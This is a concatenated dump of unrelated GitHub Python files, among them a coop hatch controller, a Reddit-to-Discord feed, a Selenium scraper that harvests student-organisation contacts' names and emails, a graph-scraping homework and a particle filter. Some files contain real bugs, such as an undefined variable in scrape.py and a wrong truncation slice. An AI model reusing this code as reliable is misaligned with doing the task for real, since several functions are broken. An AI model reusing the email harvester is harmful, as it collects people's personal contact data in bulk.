\"+risetime)\n print(\"Sunset : \"+dusktime)\n return\n\n def calculateControlerOffsets(self):\n 
results = self.calculateOffset(hatch.sunrise, hatch.offset_morning)\n hatch.open_time = \"{0}:{1}\".format(results[0], results[1])\n results = self.calculateOffset(hatch.sunset, hatch.offset_evening)\n hatch.close_time = \"{0}:{1}\".format(results[0], results[1])\n\n\n def calculateOffset(self, initial_time, offset):\n total_min = initial_time.tm_hour*60+initial_time.tm_min\n total_result = total_min + offset\n result_hour = str(math.floor(total_result/60))\n result_min = str(total_result%60)\n if len(result_hour) == 1:\n result_hour = \"0\"+result_hour\n if len(result_min) == 1:\n result_min = \"0\"+result_min\n return result_hour, result_min\n\n\nif __name__ == \"__main__\":\n \"\"\"\n This script control the hatch by opening it and closing it by using sunrise and sunset time.\n \"\"\"\n daemonizer.DaemonKiller.handle()\n script_file = os.path.realpath(__file__)\n script_dir = script_file.split('/')\n wd = '/'\n for i in range(1, len(script_dir)-2):\n wd += script_dir[i]+'/'\n os.chdir(wd)\n\n #parser = argparse.ArgumentParser()\n #parser.add_argument('offset', type=int, help=\"Offset time from the sunrise and sunset. Setting 30 will delay hatch opening and closing by 30 minutes.\")\n #args = parser.parse_args()\n\n hatch = HatchControler('40', '38')\n\n #Read configuration\n config = configparser.ConfigParser()\n config.read(\"conf.cfg\")\n ow_city = config.get('openweather', 'City_ID')\n ow_key = config.get('openweather', 'API_key')\n sun_o_c = config.get('hatch', 'sun_o_c')\n openhour = config.get('hatch', 'openhour')\n closehour = config.get('hatch', 'closehour')\n hatch.offset_morning = config.getint('hatch', 'offset_morning')\n hatch.offset_evening = config.getint('hatch', 'offset_evening')\n\n #Initialize script\n curday = time.localtime().tm_mday\n hatch.getOpenWeatherSun(ow_city, ow_key)\n hatch.calculateControlerOffsets()\n starting_script = True\n\n print(\"Hatch control enabled\")\n if sun_o_c == \"y\" or sun_o_c == \"o\":\n hatch.calculateControlerOffsets()\n schedule.every().day.at(\"00:01\").do(hatch.getOpenWeatherSun, ow_city, ow_key)\n schedule.every().day.at(\"00:10\").do(hatch.calculateControlerOffsets)\n while True:\n curtime = time.localtime()\n schedule.run_pending()\n if curtime.tm_mday != curday or starting_script:\n starting_script = False\n curday = curtime.tm_mday\n if sun_o_c == \"n\":\n print(\"Manual mode\")\n hatch.open_time = openhour\n hatch.close_time = closehour\n hatch.schedule_times()\n elif sun_o_c == \"y\" or sun_o_c == \"o\":\n print(\"Sun mode\")\n hatch.schedule_times()\n time.sleep(30)\n","repo_name":"galviset/hen-manager","sub_path":"henmanager/hatch_control.py","file_name":"hatch_control.py","file_ext":"py","file_size_in_byte":5012,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"24909296099","text":"\nimport blockchain\nimport sys\n\narguments = sys.argv\nif len(arguments) > 1:\n print(\"Start searching for argument: \",end=\"\")\n try:\n miner = int(arguments[1])\n except:\n print(\"input not converted to int\",end=\"\")\n print(arguments[1])\nelse:\n print(\"no arguments\")\n\n\nmax_char = 100\nminer = '0'\nchain_size = 5\n\nfirst_block = blockchain.mineTheNextBlock(max_char,miner,prev_hash=\"\")\n\nprint(\"genesis block: \",end=\"\")\nprint(first_block)\n\nlast_hash = first_block['hash_for_next_block']\ndel first_block['hash_for_next_block']\nblocklist = [first_block]\n\nfor i in range(1,chain_size+1):\n block_i = blockchain.mineTheNextBlock(max_char,miner,last_hash)\n 
block_i[\"Hash_%d\"%(i-1)] = last_hash\n print(block_i)\n last_hash = block_i['hash_for_next_block']\n del block_i['hash_for_next_block']\n blocklist.append(block_i)\n\nprint(\"blocklist: \")\nprint(blocklist)","repo_name":"atakkant/simple_blockchain","sub_path":"create_chain.py","file_name":"create_chain.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37109384910","text":"from selenium import webdriver\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom pathlib import Path\nimport csv\nfrom selenium.common.exceptions import TimeoutException\n\n# delete csv file if it exists\nfilename = \"emich-student-orgs.csv\"\nfileObj = Path(filename)\nif fileObj.exists():\n fileObj.unlink()\n fileObj.touch()\ncsvFile = open(filename, 'w', newline='')\n\n# prepare csv writer\nwriter = csv.DictWriter(csvFile, [\"org_name\", \"first_name\", \"last_name\", \"email\"])\nwriter.writeheader()\n\n# disable images for optimization\nfirefox_profile = webdriver.FirefoxProfile()\nfirefox_profile.set_preference('permissions.default.image', 2)\nfirefox_profile.set_preference('dom.ipc.plugins.enabled.libflashplayer.so', 'false')\n\n# set up selenium driver\ndriver = webdriver.Firefox(firefox_profile=firefox_profile)\ndriver.implicitly_wait(5) # seconds\ndriver.get(\"https://www.emich.edu/campuslife/student-orgs/getinvolved.php\")\n\nnavTable = driver.find_element_by_css_selector(\"table.osw-portals-letter-table\")\nnavButtons = navTable.find_elements_by_css_selector(\"button\")\nnavButtons = navButtons[1:]\n\norgUrls = []\n\nfor button in navButtons:\n print(button.text)\n button.click()\n linkContainers = driver.find_elements_by_css_selector(\"div.osw-portals-list-item\")\n for linkContainer in linkContainers:\n linkTag = linkContainer.find_element_by_css_selector(\"a\")\n orgUrls.append(linkTag.get_attribute(\"href\"))\n\nwait = WebDriverWait(driver, 5)\n\nfor orgUrl in orgUrls:\n print(\"processing: \" + orgUrl)\n driver.get(orgUrl)\n profileLinkTag = driver.find_element_by_css_selector(\"a[data-tab='profile']\")\n profileLinkTag.click()\n # pause execution for a second so the js can execute on the browser\n orgName = driver.find_element_by_css_selector(\"h1\").text\n\n try:\n wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, \".form-profile a\")))\n email = driver.find_element_by_css_selector(\".form-profile a\").text\n except Exception as e:\n email = None\n\n try:\n wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, \"div.position-name span\")))\n fullName = driver.find_element_by_css_selector(\"div.position-name span\").text\n fullNameArray = fullName.split(\" \")\n firstName = fullNameArray[0]\n lastName = fullNameArray[-1]\n except:\n firstName = None\n lastName = None\n finalDict = {\n \"org_name\": orgName,\n \"first_name\": firstName,\n \"last_name\": lastName,\n \"email\": email\n }\n writer.writerow(finalDict)\n print(str(finalDict))\n\n\ndriver.close()","repo_name":"stelcodes/boycott-wendys-web-scraper","sub_path":"emu/emich-student-orgs.py","file_name":"emich-student-orgs.py","file_ext":"py","file_size_in_byte":2706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23842392","text":"from datetime import datetime, timezone\nimport io\nimport json\nimport logging\nimport logging.handlers\nimport 
os\nimport sys\nimport time\nimport traceback\n\nimport discord\nimport requests\n\n\ndef setup_logging():\n \"\"\"Set up the logging module.\"\"\"\n path = os.path.dirname(os.path.abspath(__file__))\n path = os.path.join(path, \"logs\")\n\n if not os.path.exists(path):\n os.mkdir(path)\n\n logger = logging.getLogger()\n logger.setLevel(logging.INFO)\n\n streamHandler = logging.StreamHandler(stream=sys.stdout)\n\n fileHandler = logging.handlers.TimedRotatingFileHandler(\n os.path.join(path, \"log.txt\"),\n when=\"midnight\",\n backupCount=7,\n encoding=\"utf-8\",\n utc=True,\n )\n\n fmt = \"{asctime} | {levelname:<8} | {name}: {message}\"\n date = \"%d.%m.%Y %H:%M:%S\"\n formatter = logging.Formatter(fmt, date, style=\"{\")\n\n for handler in (streamHandler, fileHandler):\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n\n\ndef truncate(string, length=100):\n \"\"\"\n Truncate a string to the given length.\n\n Parameters\n ----------\n string: str\n The string to truncate.\n length: Optional[int]\n The length to trucate the string to.\n\n Returns\n -------\n str\n The truncated string.\n \"\"\"\n if len(string) <= length:\n return string\n\n return string[length - 1 :] + \"…\"\n\n\nclass DiscordRedditFeed:\n \"\"\"Sends new posts on a given subreddit through a Discord webhook.\"\"\"\n\n def __init__(self):\n self.logger = logging.getLogger(\"poster\")\n self.logger.info(\"Setting up poster.\")\n\n self._headers = {\"User-Agent\": \"DiscordRedditFeed/1.0\"}\n self._embed_colour = 0xFF4500 # Reddit brand colour.\n self._webhook_args = dict()\n self._post_webhook = None\n self._error_webhook = None\n\n @property\n def post_webhook(self):\n \"\"\"discord.Webhook: The webhook to send new posts through.\"\"\"\n if self._post_webhook is None:\n url = self.config.post_webhook\n adapter = discord.RequestsWebhookAdapter()\n\n try:\n self._post_webhook = discord.Webhook.from_url(url, adapter=adapter)\n except Exception as e:\n self.logger.exception(\"Could not create post webhook!\", exc_info=e)\n sys.exit(1)\n\n return self._post_webhook\n\n @property\n def error_webhook(self):\n \"\"\"Optional[discord.Webhook]: Webhook to send errors through.\"\"\"\n if self.config.error_webhook is None:\n return None\n\n if self._error_webhook is None:\n url = self.config.error_webhook\n adapter = discord.RequestsWebhookAdapter()\n try:\n self._error_webhook = discord.Webhook.from_url(url, adapter=adapter)\n except Exception as e:\n self.logger.exception(\"Could not create error webhook!\", exc_info=e)\n sys.exit(1)\n\n return self._error_webhook\n\n @property\n def config(self):\n \"\"\"The configuration object.\"\"\"\n return __import__(\"config\")\n\n def fetch_about(self):\n \"\"\"\n Dict[str, Any]: The about.json data of the subreddit.\n \"\"\"\n # See: https://www.reddit.com/dev/api#GET_about\n url = f\"https://www.reddit.com/r/{self.config.subreddit}/about.json\"\n resp = requests.get(url, headers=self._headers)\n\n try:\n resp.raise_for_status()\n except Exception as e:\n self.send_error(\"Could not fetch about.json!\", e)\n return None\n else:\n data = resp.json()\n return data[\"data\"]\n\n def fetch_posts(self, before=None, limit=10):\n \"\"\"\n Fetch the latest posts from the subreddit.\n\n Parameters\n ----------\n before: Optional[str]\n The fullname of the post to use as an anchor point.\n When this is not specified, posts are fetched by their\n age instead.\n limit: Optional[int]\n The maximum amount of posts to fetch. 
Defaults to 10.\n\n Returns\n -------\n Optional[List[Dict[str, Any]]]\n A list of post data. Returns ``None`` when an error\n occured and the list could not be fetched.\n \"\"\"\n # See: https://www.reddit.com/dev/api#GET_new\n url = f\"https://www.reddit.com/r/{self.config.subreddit}/new.json\"\n params = {\"limit\": limit}\n if before:\n params[\"before\"] = before\n \n resp = requests.get(url, headers=self._headers, params=params)\n\n try:\n resp.raise_for_status()\n except Exception as e:\n self.send_error(\"Could not fetch new.json!\", e)\n return None\n else:\n data = resp.json()\n return data[\"data\"][\"children\"]\n\n def send_post(self, data):\n \"\"\"\n Send a reddit post through the posts webhook.\n\n Parameters\n ----------\n data: Dict[str, Any]\n The post data.\n \"\"\"\n title = data[\"title\"]\n selftext = data[\"selftext\"]\n\n author = data[\"author\"]\n author_url = f\"https://www.reddit.com/user/{author}\"\n permalink = \"https://www.reddit.com\" + data[\"permalink\"]\n created_utc = datetime.fromtimestamp(data[\"created_utc\"])\n created_utc = created_utc.replace(tzinfo=timezone.utc)\n post_hint = data.get(\"post_hint\", None)\n\n is_spoiler = data[\"spoiler\"]\n is_nsfw = data[\"over_18\"]\n\n # Build the embed...\n embed = discord.Embed()\n embed.url = permalink\n embed.title = truncate(title, 256)\n embed.timestamp = created_utc\n embed.colour = self._embed_colour\n\n embed_author = f\"New post on /r/{self.config.subreddit}\"\n\n if post_hint == \"image\":\n embed_author = f\"New image post on /r/{self.config.subreddit}\"\n elif post_hint == \"link\":\n embed_author = f\"New link post on /r/{self.config.subreddit}\"\n\n embed.set_author(name=truncate(embed_author, 256), url=permalink)\n\n image = None\n\n if not (is_spoiler or is_nsfw):\n thumbnail = data[\"thumbnail\"]\n\n if post_hint == \"image\":\n image = data[\"url\"]\n elif thumbnail not in (None, \"spoiler\", \"self\"):\n image = thumbnail\n\n if image:\n embed.set_image(url=image)\n\n if selftext:\n embed.description = truncate(selftext, 2048)\n\n embed.add_field(name=\"Post Author\", value=f\"[{author}]({author_url})\")\n\n content_warnings = []\n if is_spoiler:\n content_warnings.append(\"spoiler\")\n if is_nsfw:\n content_warnings.append(\"nsfw\")\n\n if content_warnings:\n content_warning = \", \".join(content_warnings)\n else:\n content_warning = \"none\"\n\n embed.add_field(name=\"Content Warning\", value=content_warning)\n\n # ... 
and send it.\n self.post_webhook.send(embed=embed, **self._webhook_args)\n\n def send_error(self, message, error):\n \"\"\"\n Log an error and attempt to send it through the error webhook.\n\n Parameters\n ----------\n message: str\n The log message to include.\n error: Exception\n The error to log.\n \"\"\"\n self.logger.exception(message, exc_info=error)\n\n webhook = self.error_webhook\n if webhook is None:\n return\n\n # Build an embed for the error...\n embed = discord.Embed(title=\"Error Report\", description=message)\n embed.timestamp = datetime.datetime.utcnow()\n\n trace = traceback.format_exception(None, error, error.__traceback__)\n trace = \"\".join(trace)\n\n if len(trace) > 1024:\n shown = truncate(trace, 1024)\n else:\n shown = trace\n\n embed.add_field(name=\"Traceback\", value=f\"```\\n{shown}```\", inline=False)\n\n buffer = io.BytesIO(trace.encode(\"utf-8\"))\n file = discord.File(buffer, f\"traceback.txt\")\n\n webhook.send(embed=embed, file=file, **self._webhook_args)\n\n def run(self):\n \"\"\"\n Start fetching posts from the subreddit.\n \"\"\"\n # Set up the webhook avatar and username if enabled.\n if self.config.subreddit_username:\n self._webhook_args[\"username\"] = \"r/\" + self.config.subreddit\n\n if self.config.subreddit_avatar or self.config.subreddit_colour:\n data = self.fetch_about()\n\n if self.config.subreddit_avatar:\n icon_img = data[\"icon_img\"]\n if icon_img: # icon_img can be \"\"\n self._webhook_args[\"avatar_url\"] = icon_img\n\n if self.config.subreddit_colour:\n colour = data[\"key_color\"]\n if colour: # key_color can be \"\"\n self._embed_colour = int(colour[1:], 16)\n\n # Prepare fetch loop.\n\n # Timestamp of latest post. On Windows and Unix, this is UTC.\n # See https://docs.python.org/3/library/time.html#time.time\n created_utc = time.time()\n\n # Maximum amount of posts to fetch. 100 is the maximum.\n limit = 100\n\n # Start fetch loop.\n self.logger.info(\"Starting fetch loop.\")\n while True:\n fetch = True\n\n # Reset post cache and before.\n posts = list()\n before = None\n\n self.logger.debug(f\"Fetching posts (created_utc={created_utc}, limit={limit})\")\n while fetch:\n fetched = self.fetch_posts(before=before, limit=limit)\n if fetched is None:\n break\n\n self.logger.debug(f\"Fetched {len(fetched)} post(s).\")\n if len(fetched) == 0:\n break\n\n # Filter posts by their date, then sort oldest to newest.\n valid = [post for post in fetched if post[\"data\"][\"created_utc\"] > created_utc]\n self.logger.debug(f\"Found {len(valid)} new post(s).\")\n\n posts += valid\n posts = sorted(posts, key=lambda post: post[\"data\"][\"created_utc\"])\n\n # Fetch more relative to the oldest post if every post we\n # got was newer than our cached created_utc.\n fetch = len(valid) == len(fetched)\n\n # If we are doing another fetch, set before to the full name\n # of the oldest post we received in this fetch.\n if fetch:\n oldest = posts[0]\n before = oldest[\"data\"][\"name\"]\n\n # Send the collected posts until we are up-to-date.\n if len(posts) > 0:\n self.logger.debug(f\"Posting {len(posts)} post(s).\")\n \n for post in posts:\n try:\n self.send_post(post[\"data\"])\n except Exception as e:\n url = \"https://www.reddit.com\" + post[\"data\"][\"permalink\"]\n name = post[\"data\"][\"name\"]\n self.send_error(f\"Could not send post [{name}]({url})!\", e)\n return\n\n created_utc = max(created_utc, post[\"data\"][\"created_utc\"])\n\n # Slow down if we are sending a lot of posts. 
This is not\n # going to prevent an eventual 429 if you are spamming the\n # webhook with up to 100 posts. Thankfully, discord.py\n # handles the ratelimit for us.\n if len(posts) > 30:\n time.sleep(1)\n\n # Wait between fetch cycles.\n time.sleep(self.config.fetch_interval)\n\n\nif __name__ == \"__main__\":\n setup_logging()\n poster = DiscordRedditFeed()\n poster.run()\n","repo_name":"NotMaxee/Discord-Reddit-Feed","sub_path":"poster.py","file_name":"poster.py","file_ext":"py","file_size_in_byte":11785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35713525077","text":"import unittest\nfrom dqn.replay_buffer import PrioritizedReplayBuffer\n\nimport torch\nimport numpy as np\n\nclass TestPriorityReplayBuffer(unittest.TestCase):\n def test_alpha_zero_is_uniform_sampling(self):\n '''\n The premise of this test is to see if the buffer with parameter alpha=0.0\n will be reduced to uniform replay buffer. This is crucial since we are\n removing the replay buffer and instead use the prio-buffer when we need to\n use a replay buffer. The test verifies that the weights are equal to 1.0\n when alpha=0.0, therefore reducing the prio buffer to a simple, uniform\n replay buffer. \n '''\n n_batch = 64\n buffer_size = 200\n buffer = PrioritizedReplayBuffer(buffer_size=buffer_size,\n batch_size=n_batch, \n seed=101, \n n_total_steps=1000, \n alpha=0.0, \n beta_0=.4)\n nS, nA = 8, 4\n for _ in range(400):\n buffer.add(\n state=np.random.rand(nS),\n action=np.random.randint(0, nA),\n reward=np.random.rand(),\n next_state=np.random.rand(nS),\n done=np.random.randint(0, 2)\n )\n batch_indices = np.random.choice(np.arange(buffer_size), n_batch, replace=False)\n batch_priorities = np.abs(np.random.random(n_batch))\n buffer.update_priorities(\n batch_indices=batch_indices,\n batch_priorities=batch_priorities\n )\n sampled_values = buffer.sample(i_step=255)\n self.assertTrue(torch.all(sampled_values.weights.cpu().detach() == torch.ones_like(sampled_values.weights)))\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"syadegari/rl_projects_udacity","sub_path":"p1_Navigation/tests/test_priority_buffer.py","file_name":"test_priority_buffer.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34502255656","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\n\ndef compute_frac_satisfied(A: pd.DataFrame, D: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Computes the fraction of demand satisfied across all allocations\n\n Args:\n A (pd.DataFrame): Allocation DataFrame\n D (pd.DataFrame): Demand DataFrame\n\n Returns:\n pd.DataFrame: Demand satisfcation DataFrame\n \"\"\"\n return A.divide(D)\n\n\ndef compute_next_step_satisfication(df: pd.DataFrame, col: str, sat_frac=1.) -> float:\n \"\"\"Computes the fraction of time the system satisfied at least `sat_frac`\n demand after giving the user nothing the previous iteration\n\n Args:\n df (pd.DataFrame): DataFrame containing demand satisfication values\n col (str): Particular item (e.g., Apples)\n sat_frac (float, optional): Minimal demand satisfication value. Defaults to 1.\n\n Returns:\n float: Next-Step Satisfication value\n \"\"\"\n\n indices = df.index[df[col] == 0.] 
# Have (id, day) multi-index\n\n # Possible that no indices meet this condition therefore this measure \n # is irrelevant\n if len(indices) == 0:\n return np.nan\n\n count = 0\n last_day = max(df.index.levels[1])\n\n for idx in indices:\n # Have to check if it's the last day to avoid out-of-bound error\n if idx[1] == last_day:\n continue # By definition we cannot satisfy next day request\n else:\n frac = df[col][(idx[0], idx[1] + 1)]\n if frac >= sat_frac or np.isnan(frac):\n count += 1\n\n return count / len(indices)\n\n\ndef next_step_satisfication_by_user(df: pd.DataFrame, sat_frac: float) -> pd.DataFrame:\n \"\"\"Computes next-step satisfcation on a per-user basis\n\n Args:\n df (pd.DataFrame): DataFrame containing demand satisfication values\n sat_frac (float): Desired minimal percentage of next-step satisfcation\n\n Returns:\n pd.DataFrame: Next-Step satisfaction DataFrame on per-user basis\n \"\"\"\n\n next_step = {}\n users = df.index.levels[0] # Have multi-index with (id, day) format\n cols = df.columns\n\n for user in users:\n tmp_df = df.query('id == @user')\n vals = np.zeros(len(cols))\n for (i, col) in enumerate(cols):\n vals[i] = compute_next_step_satisfication(tmp_df, col, sat_frac)\n \n next_step[user] = np.nanmean(vals)\n\n return pd.DataFrame.from_dict(next_step, orient='index', columns=['fraction'])\n\n\ndef create_satisfaction_plot(mip_df: pd.DataFrame, greedy_df: pd.DataFrame, path: str,\n case: str):\n \"\"\"Creates bar plot showing demand satisfaction comparison between the\n MIP and greedy allocation strategy\n\n Args:\n mip_df (pd.DataFrame): MIP demand satisfaction DataFrame\n greedy_df (pd.DataFrame): Greedy demand satisfaction DataFrame\n path (str): Location to save plot\n case (str): Oracle or Learned distribution case\n \"\"\"\n mip_median = mip_df.groupby('id').mean().median(axis=1) # Id on axis=1\n greedy_median = greedy_df.groupby('id').mean().median(axis=1)\n\n index = mip_median.index\n y = np.arange(len(index))\n height = 0.35\n\n _, ax = plt.subplots(figsize=(12, 9))\n bar1 = ax.barh(y + height/2, mip_median, height, color='#beaed4', label='MIP')\n bar2 = ax.barh(y - height/2, greedy_median, height, color='#fdc086', label='Greedy')\n ax.bar_label(bar1, fmt='%.2f', padding=3, fontsize=14)\n ax.bar_label(bar2, fmt='%.2f', padding=3, fontsize=14)\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n ax.spines['bottom'].set_visible(False)\n ax.spines['left'].set_visible(False)\n ax.xaxis.set_visible(False)\n ax.set_yticks(y, index.tolist())\n\n if case == \"oracle\":\n title = 'Median Demand Satisfaction by Customer\\n (Oracle Knowledge)'\n else:\n title = 'Median Demand Satisfaction by Customer\\n (Learned Distributions)'\n\n ax.set_title(title, fontsize=24)\n ax.legend()\n plt.savefig(path, dpi=300, bbox_inches='tight')\n\n\ndef create_next_step_satisfaction_plot(mip_df: pd.DataFrame, \n path: str):\n \"\"\"Creates plot showing either full or partial demand satisfaction for the \n next step after getting nothing\n\n Args:\n mip_df (pd.DataFrame): MIP demand satisfaction DataFrame\n sat_frac (float): Minimal demand satisfication value\n path (str): Location to save plot\n \"\"\"\n mip_full = next_step_satisfication_by_user(mip_df, 1.)\n mip_partial = next_step_satisfication_by_user(mip_df, 0.01)\n index = mip_full.index\n y = np.arange(len(index))\n height = 0.35\n\n _, ax = plt.subplots(figsize=(12, 9))\n bar1 = ax.barh(y + height/2, mip_full.fraction, height, color='#beaed4', label='Full')\n bar2 = ax.barh(y - height/2, 
mip_partial.fraction, height, color='#fdc086', label='Partial')\n ax.bar_label(bar1, fmt='%.2f', padding=3, fontsize=14)\n ax.bar_label(bar2, fmt='%.2f', padding=3, fontsize=14)\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n ax.spines['bottom'].set_visible(False)\n ax.spines['left'].set_visible(False)\n ax.xaxis.set_visible(False)\n ax.set_yticks(y, index.tolist())\n ax.set_title('Median Next-Step Customer Satisfication', fontsize=24)\n ax.legend()\n plt.savefig(path, dpi=300, bbox_inches='tight')\n","repo_name":"HAI-lab-UVA/AI4G","sub_path":"decision/experiments/create_plots.py","file_name":"create_plots.py","file_ext":"py","file_size_in_byte":5390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37869748382","text":"from datetime import datetime\nfrom sqlalchemy import VARCHAR, BigInteger, Column, DateTime\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.sql import text\n\nBase = declarative_base()\n\n\nclass BaseEntity:\n id = Column('id', BigInteger, primary_key=True, autoincrement=True)\n\n createdAt = Column(\n 'created_at', DateTime, nullable=False,\n server_default=text(\"TIMEZONE('utc', CURRENT_TIMESTAMP)\")\n )\n updatedAt = Column(\n 'updated_at', DateTime, nullable=False,\n server_default=text(\"TIMEZONE('utc', CURRENT_TIMESTAMP)\"), onupdate=datetime.utcnow\n )\n\n def __repr__(self):\n return f\"{self.__class__.__name__}\"\n\n\nclass User(Base, BaseEntity):\n __tablename__ = \"user\"\n\n firstName = Column('first_name', VARCHAR(255), nullable=False)\n lastName = Column('last_name', VARCHAR(255), nullable=False)\n email = Column('email', VARCHAR(255), nullable=False)\n","repo_name":"ArsenPidhoretskyi/aws","sub_path":"service/layers/database/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37368162757","text":"# project: p3\n# submitter: zluo43\n# partner: jkang96@wisc.edu \n# hours: 10\n\n\nimport os, zipfile\n\nimport pandas as pd\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.common.exceptions import NoSuchElementException\nfrom IPython.core.display import display, Image\n\n\n\n\n\nclass GraphScraper:\n def __init__(self):\n self.visited = set()\n self.BFSorder = []\n self.DFSorder = []\n\n\ndef go(self, node):\n raise Exception(\"must be overridden in sub classes -- don't change me here!\")\n\ndef bfs_search(self, node):\n visit = []\n todo = []\n todo.append(node)\n while todo:\n node = todo.pop(0)\n if node not in visit:\n visit.append(node)\n todo.extend(self.go(self,node))\n\n\ndef dfs_search(self, node):\n visit = []\n todo = []\n todo.append(node)\n while todo:\n node = todo.pop()\n if node not in visit:\n visit.append(node)\n todo.extend(reversed(self.go(self,node)))\n\nclass FileScraper(GraphScraper):\n def __init__(self):\n super().__init__()\n if not os.path.exists(\"Files\"):\n with zipfile.ZipFile(\"files.zip\") as zf:\n zf.extractall()\n\n def go(self, node):\n with open(\"Files/\"+node+\".txt\") as f:\n data=f.read()\n lines=data.split(\"\\n\")\n self.BFSorder.append(lines[2][-1])\n self.DFSorder.append(lines[3][-1])\n return lines[1].split(\" \")\n\nclass WebScraper(GraphScraper):\n\n def __init__(self, driver=None):\n super().__init__()\n self.driver = driver\n\n# these three can be done as groupwork\n def go(self, url):\n self.driver.get(url)\n link = 
self.driver.find_elements_by_tag_name(\"a\")\n\n        list_dfs=self.driver.find_element_by_id(\"DFS\")\n        list_dfs.click()\n        self.DFSorder.append(list_dfs.text)\n\n        list_bfs=self.driver.find_element_by_id(\"BFS\")\n        list_bfs.click()\n        self.BFSorder.append(list_bfs.text)\n\n        return [link.get_attribute(\"href\") for link in links]\n\n    def dfs_pass(self, start_url):\n        super().__init__()\n        super().dfs_search(start_url)\n        return ''.join(self.DFSorder)\n\n    def bfs_pass(self, start_url):\n        super().__init__()\n        super().bfs_search(start_url)\n        return ''.join(self.BFSorder)\n\n\n","repo_name":"zluo43/cs320_project3","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":2387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"72438187640","text":"from numpy import zeros, exp, log, sum, pi, cumsum \n\n\ndef smc(init, logl, evol, resa, T, y, N):\n    \"\"\"\n    run a 1D particle filter on the horizon [1,T]\n    with N particles and observed data\n\n    Inputs:\n    init ~ initial state density \n    logl ~ log likelihood function : (y, x) -> log P(y | x)\n    evol ~ evolution function x[t] -> x[t+1]\n    resa ~ resample function\n    T ~ final time (integer)\n    y ~ vector of observed data\n    N ~ number of particles (integer)\n    \n    Output\n    \n    x ~ state space matrix \n    w ~ weights matrix \n    ess ~ ess vector\n    log_z ~ marginal log likelihood\n\n    \"\"\"\n    \n    x = zeros((N, T))\n    log_w = zeros((N, T))\n    w = zeros((N, T))\n    ess = zeros(T)\n    \n    # init \n    x[:, 0] = init(N)\n    \n    # compute the weights\n    log_w[:, 0] = logl(y[0], x[:, 0])\n    w[:, 0] = exp(log_w[:, 0])\n    \n    # and normalize \n    w_sum = sum(w[:, 0])\n    w[:, 0] /= w_sum\n    log_w[:, 0] -= log(w_sum)\n\n    # marginal log likelihood\n    log_z = log(w_sum)\n\n    # effective sample size\n    ess[0] = 1. 
/ sum(w[:, 0]**2)\n\n    # iterations\n    for t in range(1, T):\n        # resample with the user-supplied resa function, then reset the weights\n        x[:, t - 1] = resa(w[:, t - 1], x[:, t - 1])\n        log_w[:, t - 1] = -log(N)\n        w[:, t - 1] = 1./ N\n\n        # mutation\n        x[:, t] = evol(x[:, t - 1])\n\n        # weights computation\n        log_w[:, t] = log_w[:, t - 1] + logl(y[t], x[:, t])\n        w[:, t] = exp(log_w[:, t])\n\n        # normalization\n        w_sum = sum(w[:, t])\n        w[:, t] /= w_sum\n        log_w[:, t] -= log(w_sum)\n\n        #marginal log likelihood\n        log_z += log(w_sum)\n\n        ess[t] = 1./ sum(w[:, t]**2)\n    \n    return x, w, ess, log_z\n\n\n# example of parameters\nfrom numpy.random import randn, rand\n\n# initial state \nmu_1 = 0\nsigma_1 = 1\ninit = lambda N : mu_1 + sigma_1 * randn(N)\n\n# evolution\nsigma_u = 1\nevol = lambda x : x+ sigma_u * randn()\n\n# simulate a measure\nsigma_v = 1\nmeasure = lambda x : x + sigma_v * randn()\n\n# logl\nlogl = lambda x, y : -0.5 * log( 2 * pi) - log(sigma_v) - 0.5 * ((y - x)/sigma_v)**2\n\n# generate data\ndef gen_data(T):\n    x = zeros(T)\n    y = zeros(T)\n    x[0] = init(1)\n    y[0] = measure(x[0])\n    for t in range(1, T):\n        x[t] = evol(x[t-1])\n        y[t] = measure(x[t])\n    return x,y\n\n# resample\ndef resample(w, x):\n    u = rand(w.shape[0])\n    # indexes from parent particles\n    idx = sum(u[None, :]>cumsum(w)[:, None], 0)\n    #import pdb; pdb.set_trace()\n    return x[idx]\n\nt_final = 20\nN = 10000\nx, y = gen_data(t_final)\nimport time\ntic = time.time()\nx_smc, w, ess, log_z = smc(init, logl, evol, resample, t_final, y, N)\ntoc = time.time() -tic\nprint (\"tps smc = %fs\" % toc)\n#x_pf_mean = sum(x_smc * w, 0)\n#x_pf_sd = sqrt(sum( x_smc **2 * w, 0) - x_pf_mean**2)\n#it=mgrid[0.:t_final]\n#plot(it, x_pf_mean, '-', it, x_pf_mean - 1.96 * x_pf_sd, '-', \n#     it, x_pf_mean + 1.96 * x_pf_sd, '-', it, x, '-')\n","repo_name":"aitzkora/bazarD","sub_path":"smc/smc.py","file_name":"smc.py","file_ext":"py","file_size_in_byte":2902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
